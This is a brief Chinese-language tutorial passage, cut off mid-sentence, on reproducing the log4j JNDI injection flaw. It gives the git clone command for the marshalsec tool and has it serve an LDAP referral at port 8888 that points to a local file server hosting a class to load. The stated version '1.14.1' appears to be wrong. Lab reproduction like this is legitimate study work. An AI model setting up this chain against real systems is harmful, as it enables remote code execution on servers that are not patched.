log4j漏洞,jndi侵入验证复现
log4j的1.14.1往下版本需要先搭建一个LDAP服务器,git地址git clone https://github.com/mbechler/marshalsec.git执行 marshalsec.jndi.LDAPRefServer 的main函数,idea添加执行命令"http://127.0.0.1/fileService/download/1/1/#test" 8888意思是将文件服务器http://127.0.0.1/fileService/download/